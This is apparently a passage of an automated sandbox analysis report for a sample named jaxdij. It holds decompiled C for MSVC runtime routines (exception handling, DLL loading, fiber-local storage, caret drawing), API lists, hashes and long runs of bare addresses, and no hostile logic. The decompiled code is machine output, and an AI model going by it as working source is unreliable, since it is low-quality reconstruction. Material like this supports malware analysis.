                                                                                                                          0x00000000
                                                                                                                          0x0024eda6
                                                                                                                          0x0024eda6
                                                                                                                          0x0024edaa
                                                                                                                          0x0024edae
                                                                                                                          0x0024edae
                                                                                                                          0x0024edb0
                                                                                                                          0x0024edb2
                                                                                                                          0x0024edb4
                                                                                                                          0x0024edb6
                                                                                                                          0x0024edb6
                                                                                                                          0x0024edb6
                                                                                                                          0x0024edb9
                                                                                                                          0x0024edb9
                                                                                                                          0x0024edc0
                                                                                                                          0x0024edc2
                                                                                                                          0x00000000
                                                                                                                          0x0024edc8
                                                                                                                          0x0024edc8
                                                                                                                          0x0024edcc
                                                                                                                          0x0024edd0
                                                                                                                          0x0024edd0
                                                                                                                          0x0024edd2
                                                                                                                          0x0024edd4
                                                                                                                          0x0024edd6
                                                                                                                          0x0024edd8
                                                                                                                          0x0024edd8
                                                                                                                          0x0024edd8
                                                                                                                          0x0024eddb
                                                                                                                          0x0024eddb
                                                                                                                          0x0024ede2
                                                                                                                          0x0024ede4
                                                                                                                          0x00000000
                                                                                                                          0x0024edea
                                                                                                                          0x0024edea
                                                                                                                          0x0024edee
                                                                                                                          0x0024edf2
                                                                                                                          0x0024edf2
                                                                                                                          0x0024edf4
                                                                                                                          0x0024edf6
                                                                                                                          0x0024edf8
                                                                                                                          0x0024edfa
                                                                                                                          0x0024edfa
                                                                                                                          0x0024edfa
                                                                                                                          0x0024edfd
                                                                                                                          0x0024edfd
                                                                                                                          0x0024ee04
                                                                                                                          0x0024ee06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024ee06
                                                                                                                          0x0024ede4
                                                                                                                          0x0024edc2
                                                                                                                          0x0024eda0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024f192
                                                                                                                          0x0024f195
                                                                                                                          0x0024f198
                                                                                                                          0x00000000
                                                                                                                          0x0024f19e
                                                                                                                          0x0024f19e
                                                                                                                          0x0024f1a1
                                                                                                                          0x0024f1a5
                                                                                                                          0x0024f1a5
                                                                                                                          0x0024f1a7
                                                                                                                          0x0024f1a9
                                                                                                                          0x0024f1ab
                                                                                                                          0x0024f1ad
                                                                                                                          0x0024f1ad
                                                                                                                          0x0024f1ad
                                                                                                                          0x0024f1b0
                                                                                                                          0x0024f1b0
                                                                                                                          0x0024f1b7
                                                                                                                          0x0024f1b9
                                                                                                                          0x00000000
                                                                                                                          0x0024f1bf
                                                                                                                          0x0024f1bf
                                                                                                                          0x0024f1c3
                                                                                                                          0x0024f1c7
                                                                                                                          0x0024f1c7
                                                                                                                          0x0024f1c9
                                                                                                                          0x0024f1cb
                                                                                                                          0x0024f1cd
                                                                                                                          0x0024f1cf
                                                                                                                          0x0024f1cf
                                                                                                                          0x0024f1cf
                                                                                                                          0x0024f1d2
                                                                                                                          0x0024f1d2
                                                                                                                          0x0024f1d9
                                                                                                                          0x0024f1db
                                                                                                                          0x00000000
                                                                                                                          0x0024f1e1
                                                                                                                          0x0024f1e1
                                                                                                                          0x0024f1e5
                                                                                                                          0x0024f1e9
                                                                                                                          0x0024f1e9
                                                                                                                          0x0024f1eb
                                                                                                                          0x0024f1ed
                                                                                                                          0x0024f1ef
                                                                                                                          0x0024f1f1
                                                                                                                          0x0024f1f1
                                                                                                                          0x0024f1f1
                                                                                                                          0x0024f1f4
                                                                                                                          0x0024f1f4
                                                                                                                          0x0024f1fb
                                                                                                                          0x0024f1fd
                                                                                                                          0x00000000
                                                                                                                          0x0024f203
                                                                                                                          0x0024f203
                                                                                                                          0x0024f207
                                                                                                                          0x0024f20b
                                                                                                                          0x0024f20b
                                                                                                                          0x0024f20d
                                                                                                                          0x0024f20f
                                                                                                                          0x0024f211
                                                                                                                          0x0024f213
                                                                                                                          0x0024f213
                                                                                                                          0x0024f213
                                                                                                                          0x0024f216
                                                                                                                          0x0024f216
                                                                                                                          0x0024f21d
                                                                                                                          0x0024f21f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024f21f
                                                                                                                          0x0024f1fd
                                                                                                                          0x0024f1db
                                                                                                                          0x0024f1b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024e55d
                                                                                                                          0x0024e09f
                                                                                                                          0x0024e096
                                                                                                                          0x0024e08d
                                                                                                                          0x0024e084
                                                                                                                          0x0024f665
                                                                                                                          0x0024f668
                                                                                                                          0x0024dfa2
                                                                                                                          0x00000000
                                                                                                                          0x0024dfa2
                                                                                                                          0x0024dfa0
                                                                                                                          0x0024df9e
                                                                                                                          0x00000000
                                                                                                                          0x0024dfa7
                                                                                                                          0x0024dfa7
                                                                                                                          0x0024dfa9
                                                                                                                          0x0024dfb0
                                                                                                                          0x00000000
                                                                                                                          0x0024dfb2
                                                                                                                          0x00000000
                                                                                                                          0x0024dfb0
                                                                                                                          0x0024df75
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0024DF47
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0024DF4F
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0024DFD8
                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0024E003
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0024E058
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                          • Opcode ID: 9fd1a76da882fc6c5a6c02e7b71493a276e25f99e3ee27ad48c1766e065213b9
                                                                                                                          • Instruction ID: aaf2eeb50cd4e815a21a78d3ae5ab65333eff7fa3c23289b518b4320413cb7f7
                                                                                                                          • Opcode Fuzzy Hash: 9fd1a76da882fc6c5a6c02e7b71493a276e25f99e3ee27ad48c1766e065213b9
                                                                                                                          • Instruction Fuzzy Hash: C941E430A202099BCF14DF68CC85A9EBBB5BF45324F148055ED19AB392D771EE29CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00257EE7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 115COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 62%
                                                                                                                          			E00257EE7(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_t58 = E00251CAE(_t79, __ecx, __edx, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00251CAE(_t79, __ecx, __edx, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t4 =  &_a32; // 0x257ded
							_t70 = E0025434E(__edx, _t102, _t79, _a8, _a12, _a16, _a20, _a28,  *_t4);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						_t18 =  &_v40; // 0x257ded
						E002541FE(_t81, _t18,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t20 =  &_v40; // 0x257ded
						_t70 =  *_t20;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											_t37 =  &_a32; // 0x257ded
											E00257E67(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28,  *_t37);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00251C1C(_t79, _t81, _t93, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00256240(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00256240(_t65, _t83);
				}
			}






































                                                                                                                          0x00257ee7
                                                                                                                          0x00257ee7
                                                                                                                          0x00257ee7
                                                                                                                          0x00257eee
                                                                                                                          0x00257ef7
                                                                                                                          0x00258016
                                                                                                                          0x00257efd
                                                                                                                          0x00257efd
                                                                                                                          0x00257eff
                                                                                                                          0x00257f09
                                                                                                                          0x00257f0c
                                                                                                                          0x00257f12
                                                                                                                          0x00257f1c
                                                                                                                          0x00257f2e
                                                                                                                          0x00257f41
                                                                                                                          0x00257f46
                                                                                                                          0x00257f4b
                                                                                                                          0x00258012
                                                                                                                          0x00000000
                                                                                                                          0x00258013
                                                                                                                          0x00257f4b
                                                                                                                          0x00257f1c
                                                                                                                          0x00257f51
                                                                                                                          0x00257f54
                                                                                                                          0x00257f57
                                                                                                                          0x00257f5d
                                                                                                                          0x00257f71
                                                                                                                          0x00257f75
                                                                                                                          0x00257f7a
                                                                                                                          0x00257f7d
                                                                                                                          0x00257f80
                                                                                                                          0x00257f80
                                                                                                                          0x00257f83
                                                                                                                          0x00257f86
                                                                                                                          0x00257f8c
                                                                                                                          0x00257f92
                                                                                                                          0x00257f95
                                                                                                                          0x00257f98
                                                                                                                          0x00257fa7
                                                                                                                          0x00257fa8
                                                                                                                          0x00257fa8
                                                                                                                          0x00257fad
                                                                                                                          0x00257fc0
                                                                                                                          0x00257fc2
                                                                                                                          0x00257fc7
                                                                                                                          0x00257fd2
                                                                                                                          0x00257fd4
                                                                                                                          0x00257fd6
                                                                                                                          0x00257fd8
                                                                                                                          0x00257ff2
                                                                                                                          0x00257ff7
                                                                                                                          0x00257ffa
                                                                                                                          0x00257ffa
                                                                                                                          0x00257fd2
                                                                                                                          0x00257fc7
                                                                                                                          0x00258000
                                                                                                                          0x00258001
                                                                                                                          0x00258004
                                                                                                                          0x00258007
                                                                                                                          0x0025800a
                                                                                                                          0x0025800d
                                                                                                                          0x00257f98
                                                                                                                          0x00000000
                                                                                                                          0x00257f8c
                                                                                                                          0x00258017
                                                                                                                          0x0025801c
                                                                                                                          0x0025801d
                                                                                                                          0x0025801e
                                                                                                                          0x0025801f
                                                                                                                          0x0025802e
                                                                                                                          0x0025803e
                                                                                                                          0x00258045
                                                                                                                          0x0025804b
                                                                                                                          0x0025804c
                                                                                                                          0x00258058
                                                                                                                          0x0025805a
                                                                                                                          0x0025805a
                                                                                                                          0x00258069
                                                                                                                          0x00258069

                                                                                                                          APIs
                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00257DED,?,?,00000000,00000000,00000000,?), ref: 00257F0C
                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 00257FF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                          • String ID: MOC$RCC$}%$}%
                                                                                                                          • API String ID: 1435073870-4287355185
                                                                                                                          • Opcode ID: f2504528c80a4d2a33bcd1f376fc5f675f2458fdbdeebe03aade42da5af43a0e
                                                                                                                          • Instruction ID: 0c5ea56d34b45411435c1c93077ca9006e285b7ff83220b66625d1aa0d3b21c3
                                                                                                                          • Opcode Fuzzy Hash: f2504528c80a4d2a33bcd1f376fc5f675f2458fdbdeebe03aade42da5af43a0e
                                                                                                                          • Instruction Fuzzy Hash: F541793191020AAFCF25DF98DC81AAEBBB5FF08305F148099FE0467261D735A968DB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00249990 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CaretFocus$HideInvertRectReleaseShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4235554027-0
                                                                                                                          • Opcode ID: 77c2e330c1ef371bbd3df8d18ece3041bee48034c43f10168ab5ee0aeca41a3a
                                                                                                                          • Instruction ID: 4e5ae9a4268784eb7f5f647620b10e1836d89d4921065ccd6087775c44306a71
                                                                                                                          • Opcode Fuzzy Hash: 77c2e330c1ef371bbd3df8d18ece3041bee48034c43f10168ab5ee0aeca41a3a
                                                                                                                          • Instruction Fuzzy Hash: F831B674A04209EFCB04DFA8D588AAD7BF0BF08351F158469E889DB351D774EA94CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002523A9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E002523A9(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x2660b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x25cae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x2660b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x2660b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00254A99(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00254A99(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                                                                                                          0x002523b2
                                                                                                                          0x00252447
                                                                                                                          0x002523ba
                                                                                                                          0x002523bc
                                                                                                                          0x002523c6
                                                                                                                          0x002523cb
                                                                                                                          0x002523d8
                                                                                                                          0x002523ed
                                                                                                                          0x002523f1
                                                                                                                          0x00252457
                                                                                                                          0x0025245c
                                                                                                                          0x00252463
                                                                                                                          0x00252467
                                                                                                                          0x0025246a
                                                                                                                          0x0025246a
                                                                                                                          0x00252470
                                                                                                                          0x00252470
                                                                                                                          0x00252452
                                                                                                                          0x00252456
                                                                                                                          0x00252456
                                                                                                                          0x002523f3
                                                                                                                          0x002523fc
                                                                                                                          0x00252435
                                                                                                                          0x00252442
                                                                                                                          0x00252444
                                                                                                                          0x00252444
                                                                                                                          0x00000000
                                                                                                                          0x00252444
                                                                                                                          0x00252406
                                                                                                                          0x0025240b
                                                                                                                          0x00252410
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0025241a
                                                                                                                          0x0025241f
                                                                                                                          0x00252424
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00252429
                                                                                                                          0x0025242f
                                                                                                                          0x00252433
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00252433
                                                                                                                          0x002523d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002523d6
                                                                                                                          0x00252450
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,6B8B9FBA,?,002524B6,?,00250FA5,00000000,00000000), ref: 0025246A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                          • Opcode ID: 621eb363d149714e4c81741781d98c17e5dbcd34fbc85661455c290dccdb0837
                                                                                                                          • Instruction ID: 18932966d4a6692860e80f839e085bd085c5d39a7c8b85b8ea79bdeba5400d1e
                                                                                                                          • Opcode Fuzzy Hash: 621eb363d149714e4c81741781d98c17e5dbcd34fbc85661455c290dccdb0837
                                                                                                                          • Instruction Fuzzy Hash: E6213071620213E7C7219F60EC48A5A7768EB16372F148121EC02A72D0F7B0FD2DC6D8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00251CBC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00251CBC(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x264064 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00256006(_t13,  *0x264064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00256041(_t14,  *0x264064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00250F82();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00256041(_t18,  *0x264064, 0);
								} else {
									_t8 = E00256041(_t18,  *0x264064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00250F8D(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                                                                                          0x00251cbc
                                                                                                                          0x00251cc3
                                                                                                                          0x00251cd6
                                                                                                                          0x00251cdd
                                                                                                                          0x00251cdf
                                                                                                                          0x00251ce3
                                                                                                                          0x00251cfc
                                                                                                                          0x00251cfc
                                                                                                                          0x00251ce5
                                                                                                                          0x00251ce7
                                                                                                                          0x00251cfa
                                                                                                                          0x00251d01
                                                                                                                          0x00251d0a
                                                                                                                          0x00251d0d
                                                                                                                          0x00251d10
                                                                                                                          0x00251d24
                                                                                                                          0x00251d24
                                                                                                                          0x00251d2d
                                                                                                                          0x00251d12
                                                                                                                          0x00251d19
                                                                                                                          0x00251d1f
                                                                                                                          0x00251d22
                                                                                                                          0x00251d36
                                                                                                                          0x00251d38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00251d22
                                                                                                                          0x00251d3b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00251cfa
                                                                                                                          0x00251ce7
                                                                                                                          0x00251d43
                                                                                                                          0x00251d4d
                                                                                                                          0x00251cc5
                                                                                                                          0x00251cc7
                                                                                                                          0x00251cc7

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,00251CB3,0024DD73,0024D8CB), ref: 00251CCA
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00251CD8
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00251CF1
                                                                                                                          • SetLastError.KERNEL32(00000000,00251CB3,0024DD73,0024D8CB), ref: 00251D43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 37c846afd4853ed79337b40909045f3f3bf9323891cc20f549a28949c43cc61b
                                                                                                                          • Instruction ID: 0bab634ebcf874ac78f7f6b916e45b4a5425187946b473ce05b3699d1fbe497b
                                                                                                                          • Opcode Fuzzy Hash: 37c846afd4853ed79337b40909045f3f3bf9323891cc20f549a28949c43cc61b
                                                                                                                          • Instruction Fuzzy Hash: D001883223A3326E96382A757C9E66626A4DB41777730422AFE10450E1EEB14C79564C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024B460 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 3626877506-2564639436
                                                                                                                          • Opcode ID: 5179f21518da6b01083f01724cc82722e11005f39bdeff9b745b27807fa5048a
                                                                                                                          • Instruction ID: 4726ef6040d5b45ca879b075fa90dff7ebd7d4a25bc669ae38ace49354d85347
                                                                                                                          • Opcode Fuzzy Hash: 5179f21518da6b01083f01724cc82722e11005f39bdeff9b745b27807fa5048a
                                                                                                                          • Instruction Fuzzy Hash: 7471B374A002199FCB08CF58C498AADBBF1FF48315F1584A9E889DB352D775EA91CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002433B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: System
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 3470857405-2679148245
                                                                                                                          • Opcode ID: 5718e81a2d9beb01916fa9bc032357b15c4c9f4db6e7b310c552afa908d9ec4d
                                                                                                                          • Instruction ID: b7ff786781a64fb54029c490044b3a1ea445992f0500fa9f76e59dc2bc131973
                                                                                                                          • Opcode Fuzzy Hash: 5718e81a2d9beb01916fa9bc032357b15c4c9f4db6e7b310c552afa908d9ec4d
                                                                                                                          • Instruction Fuzzy Hash: E7414EB4104208EFD740EF18D198B9ABBE0FB48314F01C45AEC688B362D7BAE958CF41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

